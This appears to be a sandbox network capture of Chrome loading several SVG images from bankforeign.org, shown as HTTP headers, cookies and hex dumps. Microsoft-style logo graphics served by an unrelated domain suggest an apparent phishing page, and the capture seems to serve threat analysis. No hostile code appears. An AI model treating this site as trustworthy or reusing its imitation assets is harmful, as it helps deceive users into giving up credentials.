                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3CVMS9paJXbp2vXvTdargwP5zWrHt%2BzEjweRCXi8Hm%2FtbR55Ra%2Fc4CWtHg75EvohoY%2BlKwHH7q9Pao56b6xtwbh7o15vkXA8dworQ8hhzqSEHr%2Fgg2FD7ntVBE2Zhne3NNA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed00056c2344d9-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:48 UTC706INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                            Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c
                                                            Data Ascii: .414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,
                                                            2024-02-01 20:38:48 UTC1369INData Raw: 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38
                                                            Data Ascii: 213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M8
                                                            2024-02-01 20:38:48 UTC214INData Raw: 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                            Data Ascii: "/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                            2024-02-01 20:38:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.449783104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:47 UTC1173OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:48 UTC657INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:48 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: MISS
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0S4PiP0gxocJhKQemQtsT797FCYuyJA0Lc5eZmR5DHkBAbV2hPmaVeY9qEqq9L3ty%2FbEUuwvg736Di0HPBf6U%2FMUaISYZglgHqzPpEiZbY2GOC5E9jkVOoKnjMTh2o0WiMY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed00057b7453af-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:48 UTC712INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                            Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                            2024-02-01 20:38:48 UTC887INData Raw: 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e 39 33 38 2d 32 2e 38 35 39 41 39 2e 32 36 39 2c 39 2e 32 36 39 2c 30 2c 30 2c 30 2c 32 32 2e 35 2c 31 30 2e 37 31 39 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2c 31 39 2c 31 30 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 33 2e 35 2e 37 2c 38 2e 39 2c 38 2e
                                                            Data Ascii: 0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.
                                                            2024-02-01 20:38:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.449784104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:47 UTC1199OUTGET /x/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb75 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:48 UTC632INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:48 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yKPW4M13tOag5OHOPxW9SbKWu%2B8XGfqRrvHmxETc9d8e4Q2ss4XN%2FpBCNTyBUz0diQI1hFKH9HRPz32%2FOgywkXi0yPN7LdfJkHmkLL6O9mgeJOcGg0461OpW1vW1CYTPz0U%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed000569606737-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:48 UTC737INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                            Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                            2024-02-01 20:38:48 UTC1134INData Raw: 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 2f 72 61 64 69
                                                            Data Ascii: D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radi
                                                            2024-02-01 20:38:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.449786104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:48 UTC598OUTGET /o/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb9d HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:49 UTC628INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:49 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RODWni%2FixUObwklFR0WOJ1QEenzNIoVu1Qlyz1c41V3AadT3O1LYeMbow676mZmgXx0BgGLXsmmzjxNSjErAwgoRNOrRZRF7FJbh95UYPcAQwIzIkzP6D1lU3viAj6tKyb8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed000befc67bbe-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:49 UTC741INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                            Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                            2024-02-01 20:38:49 UTC1369INData Raw: 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 33 37 35 2e 31 76 32 2e 33 35 38 61 32 2e 30 34 2c 32 2e 30
                                                            Data Ascii: 0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.0
                                                            2024-02-01 20:38:49 UTC1369INData Raw: 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38 35 2e 32 37 38 2c 31 33 2e 36 41 35 2e 33 35 38 2c 35 2e 33 35 38 2c 30 2c 30 2c 31 2c 38 36 2e 36 36 34
                                                            Data Ascii: 706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,0,0,1,86.664
                                                            2024-02-01 20:38:49 UTC179INData Raw: 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                            Data Ascii: height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                            2024-02-01 20:38:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.449787104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:48 UTC568OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:49 UTC663INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:49 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: MISS
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SHdCYC0aToi9H6hVPg%2FP6T%2FUJvTizMUOeMgnsRsgjbmsYfiqMU2umMbAA7vcFncbSW62YJOK%2BGXRvE5wZQ1g%2BA8xFHg6CkUjiwBtaQzZ9ibJ458V8k3eoZabDN%2FsBFi9H44%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed000caea36a7b-ATL
                                                            alt-svc: h3=":443"; ma=86400
